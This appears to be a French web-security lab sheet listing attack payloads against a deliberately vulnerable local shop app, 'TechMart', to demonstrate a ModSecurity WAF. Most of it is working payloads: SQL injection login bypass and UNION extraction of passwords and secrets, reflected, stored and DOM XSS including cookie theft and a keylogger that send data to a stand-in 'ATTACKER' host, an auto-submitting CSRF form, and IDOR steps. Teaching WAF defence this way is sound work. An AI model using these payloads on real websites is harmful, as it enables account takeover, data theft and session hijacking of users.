╔══════════════════════════════════════════════════════════════════════╗
║   TECHMART — PAYLOADS DE DÉMONSTRATION                               ║
║   TP Sécurité Web — Usage pédagogique uniquement                     ║
╚══════════════════════════════════════════════════════════════════════╝

┌─────────────────────────────────────────────────────────────────────┐
│  ACCÈS                                                              │
│  AVANT WAF  →  http://localhost:5000                                │
│  APRÈS WAF  →  http://localhost:8080                                │
└─────────────────────────────────────────────────────────────────────┘

═══════════════════════════════════════════════════════════════════════
1. SQLi BYPASS — /login
═══════════════════════════════════════════════════════════════════════

Requête générée :
  SELECT * FROM users WHERE username='{INPUT}' AND password='{INPUT}'

Payload A — Connexion admin directe :
  Username : admin' --
  Password : (vide)
  → La requête devient : WHERE username='admin' --' AND password=''
  → Le -- commente la vérification mot de passe

Payload B — Bypass générique (premier utilisateur) :
  Username : ' OR '1'='1' --
  Password : (vide)
  → WHERE username='' OR '1'='1' --' AND password=''
  → Retourne le premier utilisateur (admin)

Payload C — Cibler le rôle admin :
  Username : ' OR role='admin' --
  Password : (vide)

═══════════════════════════════════════════════════════════════════════
2. SQLi UNION — /search
═══════════════════════════════════════════════════════════════════════

Requête générée :
  SELECT p.*, c.name, c.color FROM products p
  JOIN categories c ON p.category_id=c.id
  WHERE p.name LIKE '%{INPUT}%' ...

Étape 1 — Compter les colonnes (doit être 13) :
  %' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 --

Étape 2 — Extraire les données secrètes :
  %' UNION SELECT 1,label,value,4,5,6,7,8,9,10,11,12,13 FROM secret_data --

  Résultat affiché dans la grille :
  ┌──────────────────┬──────────────────────────────────────┐
  │ FLAG             │ FLAG{techmart_sqli_union_pwned_2024} │
  │ DB_PASSWORD      │ sup3r_s3cr3t_db_p@ss!               │
  │ STRIPE_KEY       │ sk_live_TechMart_47f8a2c91b3d        │
  │ ADMIN_JWT        │ eyJhbGciOiJIUzI1NiJ9...              │
  │ SMTP_PASS        │ TechMart_Mail_2024!                  │
  └──────────────────┴──────────────────────────────────────┘

Étape 3 — Lister les tables SQLite :
  %' UNION SELECT 1,name,sql,4,5,6,7,8,9,10,11,12,13 FROM sqlite_master WHERE type='table' --

Étape 4 — Extraire tous les utilisateurs et mots de passe :
  %' UNION SELECT 1,username,password,4,5,6,7,8,9,10,11,12,13 FROM users --

═══════════════════════════════════════════════════════════════════════
3. SQLi SUR ID PRODUIT — /product/{id}
═══════════════════════════════════════════════════════════════════════

URL vulnérable :
  http://localhost:5000/product/1 AND 1=2
  http://localhost:5000/product/1 AND 1=1
  http://localhost:5000/product/0 UNION SELECT 1,label,value,4,5,6,7,8,9,10,11,12,13 FROM secret_data WHERE id=1

═══════════════════════════════════════════════════════════════════════
4. SQLi COUPON — /cart (code promo)
═══════════════════════════════════════════════════════════════════════

Requête générée :
  SELECT * FROM coupons WHERE code='{INPUT}' AND active=1

Payload — Activer coupon ADMIN50 (-50%) malgré active=0 :
  Code : PROMO10' OR 1=1 --
  → WHERE code='PROMO10' OR 1=1 --' AND active=1
  → Le -- commente le filtre AND active=1
  → Retourne TOUS les coupons, dont ADMIN50 (50% de réduction) ✓

  Note : le premier coupon retourné est appliqué

═══════════════════════════════════════════════════════════════════════
5. XSS RÉFLÉCHI — /search?q=
═══════════════════════════════════════════════════════════════════════

Le paramètre q est affiché via |safe dans le template → XSS Réfléchi.

Payload basique :
  URL : http://localhost:5000/search?q=<script>alert(document.cookie)</script>

Payload vol de cookies :
  URL : http://localhost:5000/search?q=<script>fetch('http://ATTACKER/steal?c='+document.cookie)</script>

Payload discret :
  URL : http://localhost:5000/search?q=<img src=x onerror=alert('XSS Réfléchi !')>

Payload SVG :
  URL : http://localhost:5000/search?q=<svg onload=alert(1)>

═══════════════════════════════════════════════════════════════════════
6. XSS STOCKÉ — /product/{id} (avis clients)
═══════════════════════════════════════════════════════════════════════

Le contenu des avis est affiché via |safe → XSS Stocké persistant.

1. Se connecter (alice / alice123)
2. Aller sur n'importe quel produit (ex: /product/1)
3. Laisser un avis avec comme contenu :

   Payload script :
   <script>alert('XSS Stocké ! Cookie = '+document.cookie)</script>

   Payload image :
   <img src=x onerror="alert('XSS Stocké exécuté pour chaque visiteur !')">

   Payload keylogger simulé :
   <script>document.onkeydown=function(e){new Image().src='http://ATTACKER/log?k='+e.key}</script>

4. Recharger la page → le payload s'exécute pour chaque visiteur !

═══════════════════════════════════════════════════════════════════════
7. XSS DOM — /category/{id}?sort= et /profile?tab=
═══════════════════════════════════════════════════════════════════════

Le paramètre est injecté via innerHTML dans le JS côté client.

Payload sur la catégorie :
  URL : http://localhost:5000/category/1?sort=<img src=x onerror=alert(document.cookie)>
  URL : http://localhost:5000/category/1?sort=<script>alert(1)</script>

Payload sur le profil :
  URL : http://localhost:5000/profile?tab=<img src=x onerror=alert('XSS DOM Profile')>

Code vulnérable dans le template :
  var tabParam = "{{ tab }}";
  document.getElementById('x').innerHTML = tabParam; // ← VULNÉRABLE

═══════════════════════════════════════════════════════════════════════
8. CSRF — /cart/add, /checkout, /profile
═══════════════════════════════════════════════════════════════════════

Les formulaires POST n'ont aucun token CSRF.
Une page externe peut déclencher des actions au nom de l'utilisateur.

Page malveillante simulée (à servir localement) :
  <html>
  <body onload="document.forms[0].submit()">
  <form action="http://localhost:5000/cart/add" method="post">
    <input type="hidden" name="product_id" value="1">
    <input type="hidden" name="qty" value="99">
  </form>
  Chargement...
  </body>
  </html>

Résultat : si la victime visite cette page PENDANT sa session TechMart,
le produit #1 (MacBook Pro 3299€) est ajouté 99 fois à son panier !

═══════════════════════════════════════════════════════════════════════
9. IDOR — /orders/{id}
═══════════════════════════════════════════════════════════════════════

Aucune vérification que order.user_id == session.user_id.

1. Se connecter en tant que bob (bob / bob456)
2. Visiter http://localhost:5000/orders/1 → commande d'alice
3. Visiter http://localhost:5000/orders/3 → commande de charlie
4. Visiter http://localhost:5000/orders/4 → deuxième commande d'alice

═══════════════════════════════════════════════════════════════════════
10. AUTH — Mots de passe en clair
═══════════════════════════════════════════════════════════════════════

1. Faire SQLi Bypass sur /login → connexion admin
2. Visiter http://localhost:5000/admin/users
3. Tous les mots de passe sont visibles en clair dans l'interface !

Comptes pré-créés :
  admin / Admin@1234
  alice / alice123
  bob   / bob456
  charlie / charlie789

═══════════════════════════════════════════════════════════════════════
  SCÉNARIO COMPLET POUR LA DÉMO (5 minutes)
═══════════════════════════════════════════════════════════════════════

1. SANS WAF (port 5000)
   a. /login → SQLi Bypass : admin' --  → connexion admin ✓
   b. /search → SQLi UNION extraire secret_data ✓
   c. /product/1 → Laisser un avis XSS Stocké → recharger ✓
   d. /search?q=<script>alert(1)</script> → XSS Réfléchi ✓
   e. /category/1?sort=<img src=x onerror=alert(1)> → XSS DOM ✓
   f. /admin/users → mots de passe en clair ✓
   g. /orders/1 en étant connecté bob → IDOR ✓

2. AVEC WAF (port 8080)
   → Changer MODSECURITY_SEC_RULE_ENGINE: "On" dans docker-compose.yml
   → docker-compose restart techmart_waf
   a. Rejouer les payloads → bloqués avec 403 Forbidden ✓
   b. Montrer les logs WAF : docker logs techmart_waf ✓
